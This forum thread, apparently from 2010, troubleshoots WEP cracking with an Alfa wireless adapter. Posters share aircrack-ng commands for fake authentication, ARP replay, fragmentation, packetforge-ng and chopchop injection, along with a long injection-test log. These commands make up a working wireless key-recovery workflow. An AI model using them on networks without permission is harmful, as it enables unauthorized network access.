Results 1 to 8 of 8

Thread: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

  1. #1
    Just burned his ISO verysofttoiletpaper's Avatar
    Join Date
    Apr 2010
    Posts
    11

    Default Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    Hello

    Just bought a new Alfa AWUS036H 1W version.

    I've successfully tried this method with other dongles and devices like rt73 chipsets and modified fonera, all worked fine.
    With the Alfa adaptor I'm not managing to increase the capture speed with aireplay packet injection.

    Already tried standard ARP-request replay (-3) and interactive frame selection (-2).
    I'm able to inject packets but the data on airodump-ng doesn't increase.

    Here are the list of comands I used:

    Monitor mode:
    airmon-ng start wlan0

    Start capture:
    airodump-ng mon0 –c (channel) –bssid (bssid) –w (file name)

    Fake authetication:
    aireplay-ng mon0 -1 0 –a (bssid)
    also tried: aireplay-ng mon0 -1 6000 -o 1 -p 10 -a (bssid)

    Injection:
    aireplay-ng mon0 -3 –b (bssid)
    also tried: aireplay-ng mon0 -2 -p 0841 -a (bssid)

    In both injection methods was able to capture relevant packets and inject them but with no increase in capture speed.

    Do you know how to solve this?

    Thank you in advance

    Here is some more info.

    Strange injection test

    Code:
    user@bt:~# aireplay-ng --test mon0 -B
    08:50:16  Trying broadcast probe requests...
    08:50:17  Injection is working!
    08:50:18  Found 9 APs
    
    08:50:18  Trying directed probe requests...
    08:50:18  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID1'
    08:50:18  Ping (min/avg/max): 2.680ms/7.753ms/20.206ms Power: -58.17
    08:50:18  30/30: 100%
    
    08:50:19  XX:XX:XX:XX:XX:XX - channel: 5 - 'ESSID2'
    08:50:19  Ping (min/avg/max): 4.422ms/12.744ms/34.941ms Power: -51.07
    08:50:19  30/30: 100%
    
    08:50:19  XX:XX:XX:XX:XX:XX - channel: 4 - 'ESSID3'
    08:50:20  Ping (min/avg/max): 2.356ms/16.275ms/30.673ms Power: -68.52
    08:50:20  27/30:  90%
    
    08:50:20  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID4'
    08:50:22  Ping (min/avg/max): 2.551ms/56.281ms/90.835ms Power: -62.33
    08:50:22  30/30: 100%
    
    08:50:22  XX:XX:XX:XX:XX:XX - channel: 3 - 'ESSID5'
    08:50:24  Ping (min/avg/max): 2.789ms/50.461ms/124.735ms Power: -61.83
    08:50:24  30/30: 100%
    
    08:50:24  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID6'
    08:50:25  Ping (min/avg/max): 2.375ms/30.914ms/48.711ms Power: -62.03
    08:50:25  30/30: 100%
    
    08:50:25  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID7'
    08:50:26  Ping (min/avg/max): 11.234ms/29.659ms/54.035ms Power: -46.30
    08:50:26  30/30: 100%
    
    08:50:26  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID8'
    08:50:27  Ping (min/avg/max): 2.579ms/21.330ms/38.686ms Power: -57.68
    08:50:27  28/30:  93%
    
    08:50:27  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID9'
    08:50:28  Ping (min/avg/max): 3.037ms/13.490ms/27.155ms Power: -68.62
    08:50:28  29/30:  96%
    
    08:50:28  Trying directed probe requests for all bitrates...
    
    08:50:28  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID1'
    08:50:28  Probing at 1.0 Mbps:  28/30:  93%
    08:50:29  Probing at 2.0 Mbps:  30/30: 100%
    08:50:30  Probing at 5.5 Mbps:  29/30:  96%
    08:50:31  Probing at 6.0 Mbps:  27/30:  90%
    08:50:31  Probing at 9.0 Mbps:  30/30: 100%
    08:50:32  Probing at 11.0 Mbps: 29/30:  96%
    08:50:33  Probing at 12.0 Mbps: 30/30: 100%
    08:50:34  Probing at 18.0 Mbps: 29/30:  96%
    08:50:34  Probing at 24.0 Mbps: 27/30:  90%
    08:50:35  Probing at 36.0 Mbps: 29/30:  96%
    08:50:36  Probing at 48.0 Mbps: 29/30:  96%
    08:50:37  Probing at 54.0 Mbps: 29/30:  96%
    
    08:50:37  XX:XX:XX:XX:XX:XX - channel: 5 - 'ESSID2'
    08:50:39  Probing at 1.0 Mbps:  10/30:  33%
    08:50:41  Probing at 2.0 Mbps:   9/30:  30%
    08:50:43  Probing at 5.5 Mbps:   9/30:  30%
    08:50:45  Probing at 6.0 Mbps:  10/30:  33%
    08:50:47  Probing at 9.0 Mbps:  11/30:  36%
    08:50:49  Probing at 11.0 Mbps:  9/30:  30%
    08:50:51  Probing at 12.0 Mbps: 13/30:  43%
    08:50:53  Probing at 18.0 Mbps: 10/30:  33%
    08:50:55  Probing at 24.0 Mbps: 13/30:  43%
    08:50:57  Probing at 36.0 Mbps: 10/30:  33%
    08:50:59  Probing at 48.0 Mbps: 10/30:  33%
    08:51:01  Probing at 54.0 Mbps:  9/30:  30%
    
    08:51:01 XX:XX:XX:XX:XX:XX - channel: 4 - 'ESSID3'
    08:51:04  Probing at 1.0 Mbps:   0/30:   0%
    08:51:07  Probing at 2.0 Mbps:   0/30:   0%
    08:51:10  Probing at 5.5 Mbps:   0/30:   0%
    08:51:13  Probing at 6.0 Mbps:   0/30:   0%
    08:51:16  Probing at 9.0 Mbps:   0/30:   0%
    08:51:19  Probing at 11.0 Mbps:  0/30:   0%
    08:51:22  Probing at 12.0 Mbps:  0/30:   0%
    08:51:25  Probing at 18.0 Mbps:  0/30:   0%
    08:51:28  Probing at 24.0 Mbps:  0/30:   0%
    08:51:31  Probing at 36.0 Mbps:  0/30:   0%
    08:51:34  Probing at 48.0 Mbps:  0/30:   0%
    08:51:37  Probing at 54.0 Mbps:  0/30:   0%
    
    08:51:37  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID4'
    08:51:38  Probing at 1.0 Mbps:  26/30:  86%
    08:51:40  Probing at 2.0 Mbps:  26/30:  86%
    08:51:41  Probing at 5.5 Mbps:  25/30:  83%
    08:51:42  Probing at 6.0 Mbps:  28/30:  93%
    08:51:44  Probing at 9.0 Mbps:  27/30:  90%
    08:51:45  Probing at 11.0 Mbps: 25/30:  83%
    08:51:46  Probing at 12.0 Mbps: 27/30:  90%
    08:51:48  Probing at 18.0 Mbps: 25/30:  83%
    08:51:49  Probing at 24.0 Mbps: 25/30:  83%
    08:51:51  Probing at 36.0 Mbps: 26/30:  86%
    08:51:52  Probing at 48.0 Mbps: 24/30:  80%
    08:51:53  Probing at 54.0 Mbps: 27/30:  90%
    
    08:51:53  XX:XX:XX:XX:XX:XX - channel: 3 - 'ESSID5'
    08:51:56  Probing at 1.0 Mbps:   0/30:   0%
    08:51:59  Probing at 2.0 Mbps:   0/30:   0%
    08:52:02  Probing at 5.5 Mbps:   0/30:   0%
    08:52:05  Probing at 6.0 Mbps:   0/30:   0%
    08:52:08  Probing at 9.0 Mbps:   0/30:   0%
    08:52:11  Probing at 11.0 Mbps:  0/30:   0%
    08:52:14  Probing at 12.0 Mbps:  0/30:   0%
    08:52:17  Probing at 18.0 Mbps:  0/30:   0%
    08:52:20  Probing at 24.0 Mbps:  0/30:   0%
    08:52:23  Probing at 36.0 Mbps:  0/30:   0%
    08:52:26  Probing at 48.0 Mbps:  0/30:   0%
    08:52:29  Probing at 54.0 Mbps:  0/30:   0%
    
    08:52:29  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID6'
    08:52:30  Probing at 1.0 Mbps:  29/30:  96%
    08:52:30  Probing at 2.0 Mbps:  30/30: 100%
    08:52:31  Probing at 5.5 Mbps:  29/30:  96%
    08:52:31  Probing at 6.0 Mbps:  30/30: 100%
    08:52:32  Probing at 9.0 Mbps:  28/30:  93%
    08:52:32  Probing at 11.0 Mbps: 27/30:  90%
    08:52:33  Probing at 12.0 Mbps: 29/30:  96%
    08:52:33  Probing at 18.0 Mbps: 30/30: 100%
    08:52:34  Probing at 24.0 Mbps: 27/30:  90%
    08:52:34  Probing at 36.0 Mbps: 29/30:  96%
    08:52:35  Probing at 48.0 Mbps: 29/30:  96%
    08:52:35  Probing at 54.0 Mbps: 30/30: 100%
    
    08:52:35  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID7'
    08:52:38  Probing at 1.0 Mbps:   0/30:   0%
    08:52:41  Probing at 2.0 Mbps:   0/30:   0%
    08:52:44  Probing at 5.5 Mbps:   0/30:   0%
    08:52:47  Probing at 6.0 Mbps:   0/30:   0%
    08:52:50  Probing at 9.0 Mbps:   0/30:   0%
    08:52:53  Probing at 11.0 Mbps:  0/30:   0%
    08:52:56  Probing at 12.0 Mbps:  0/30:   0%
    08:52:59  Probing at 18.0 Mbps:  0/30:   0%
    08:53:02  Probing at 24.0 Mbps:  0/30:   0%
    08:53:05  Probing at 36.0 Mbps:  0/30:   0%
    08:53:08  Probing at 48.0 Mbps:  0/30:   0%
    08:53:11  Probing at 54.0 Mbps:  0/30:   0%
    
    08:53:11  XX:XX:XX:XX:XX:XX - channel: 1 - 'ESSID8'
    08:53:14  Probing at 1.0 Mbps:   0/30:   0%
    08:53:17  Probing at 2.0 Mbps:   0/30:   0%
    08:53:20  Probing at 5.5 Mbps:   0/30:   0%
    08:53:23  Probing at 6.0 Mbps:   0/30:   0%
    08:53:26  Probing at 9.0 Mbps:   0/30:   0%
    08:53:29  Probing at 11.0 Mbps:  0/30:   0%
    08:53:32  Probing at 12.0 Mbps:  0/30:   0%
    08:53:35  Probing at 18.0 Mbps:  0/30:   0%
    08:53:38  Probing at 24.0 Mbps:  0/30:   0%
    08:53:41  Probing at 36.0 Mbps:  0/30:   0%
    08:53:44  Probing at 48.0 Mbps:  0/30:   0%
    08:53:47  Probing at 54.0 Mbps:  0/30:   0%
    
    08:53:47  XX:XX:XX:XX:XX:XX - channel: 6 - 'ESSID9'
    08:53:48  Probing at 1.0 Mbps:  24/30:  80%
    08:53:49  Probing at 2.0 Mbps:  22/30:  73%
    08:53:50  Probing at 5.5 Mbps:  24/30:  80%
    08:53:51  Probing at 6.0 Mbps:  22/30:  73%
    08:53:52  Probing at 9.0 Mbps:  24/30:  80%
    08:53:53  Probing at 11.0 Mbps: 22/30:  73%
    08:53:53  Probing at 12.0 Mbps: 25/30:  83%
    08:53:54  Probing at 18.0 Mbps: 22/30:  73%
    08:53:55  Probing at 24.0 Mbps: 22/30:  73%
    08:53:56  Probing at 36.0 Mbps: 26/30:  86%
    08:53:57  Probing at 48.0 Mbps: 25/30:  83%
    08:53:58  Probing at 54.0 Mbps: 23/30:  76%
    Thank you
    Last edited by Archangel-Amael; 04-12-2010 at 01:48 PM.

  2. #2
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    vstp - given the commands you listed, I'm shocked that you were able to get it to work on other dongles; your command arguments are incomplete. For example, your Fake Authentication and ARP replay attacks are both missing the -h <interface MAC> argument and your Fake Authentication attack is also missing the -e <target AP ESSID>. Google aircrack-ng and study the various commands and their associated argument list.

    Also, don't forget to start your adapter in monitor mode on the target AP channel.

  3. #3
    Just burned his ISO verysofttoiletpaper's Avatar
    Join Date
    Apr 2010
    Posts
    11

    Default Re: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    @hypervista: Depending on the version of the aircrack-ng, the -h argument is required or not.
    In the version included with backtrack 4, if we don't provide a source mac adress (-h) it will automatically use the adress of our board,in this case, the adress we want to use since it's a clientless attack and we are performing a fake authentication attack.

    In the fake authentication, the ESSID is also not required. You can use just the BSSID, just the ESSID, or both.

    Now, just to clear out the doubts, I will try to put the card in monitor mode in a specific channel instead of using airmon-ng.

    I will also use the arguments in fault but I have strong convictions that the problem is no there..

    More suggestions are welcome

  4. #4
    Just burned his ISO verysofttoiletpaper's Avatar
    Join Date
    Apr 2010
    Posts
    11

    Default Re: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    It is working now. I could not identify what the problem is but I suspect that is something related with the fake authentication.

    Starting the monitor mode in a specific channel with airmon-ng start wlan0 6 didn't had actual results.

    When I did an airodump it hoped by all channels like usual.

    Tahnk you anyway

  5. #5
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    vstp - I stand corrected. I vaguely recalled omitting the -h argument and getting an error message, what I didn't recall was it continuing, as you said, assuming the card's MAC.

    Have you tried the Fragmentation attack?

    Code:
    aireplay-ng -5 -b <AP MAC> -h <iface MAC (optional :D)> <iface>
    The key stream will be captured to a .xor file, which will be used to conduct packet forging

    Code:
    packetforge-ng -0 -a <AP MAC> -h <iface MAC> -k 255.255.255.255 -l 255.255.255.255 -y <filename .xor from previous step> -w <arp-rqst>
    Then inject forged packet

    Code:
    aireplay-ng -2 -r <arp-rqst> <iface>
    That should speed up IV collection.

  6. #6
    Just burned his ISO verysofttoiletpaper's Avatar
    Join Date
    Apr 2010
    Posts
    11

    Default Re: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    yes I tryed the fragmentation without success. I was not able to generate a valid keystream.

    However the chopchop attack (-4) worked well, although slow. I was able to generate an arprequest packet and inject it at about 250pps.

    The standard arp replay was faster at about 450pps.

    Thank you for your responses

  7. #7
    Senior Member shamanvirtuel's Avatar
    Join Date
    Mar 2010
    Location
    Somewhere in the "Ex" human right country
    Posts
    2,988

    Default Re: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    in any case, your p0841 attack is false

    aireplay-ng -2 -F -p0841 -m 68 -n 86 -b APMAC -h CLIMAC -c FF:FF:FF:FF:FF:FF mon0

    ++
    SV
    Watch your back, your packetz will belong to me soon... xD

    BackTrack :
    Giving Machine Guns to Monkeys since 2006

  8. #8
    Just burned his ISO verysofttoiletpaper's Avatar
    Join Date
    Apr 2010
    Posts
    11

    Default Re: Packet injection doesn't increase IVs capture speed (Alfa AWUS036H 1W)

    Yeh, I also tried that clientless attack is fast to begin because is uses any packet to inject.

    However the injection rate was very slow, about 50pps

Similar Threads

  1. Increase Speed k/s
    By baker24 in forum OLD Newbie Area
    Replies: 13
    Last Post: 01-04-2010, 07:34 PM
  2. How to increase max packet injection rate?
    By toymachineman19 in forum OLD Wireless
    Replies: 13
    Last Post: 04-08-2009, 09:39 PM
  3. Replies: 18
    Last Post: 04-22-2008, 07:31 PM
  4. Replies: 5
    Last Post: 11-13-2007, 11:09 PM
  5. How do you speed up packet injection?
    By heyaz in forum OLD Newbie Area
    Replies: 20
    Last Post: 08-15-2007, 05:36 PM

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •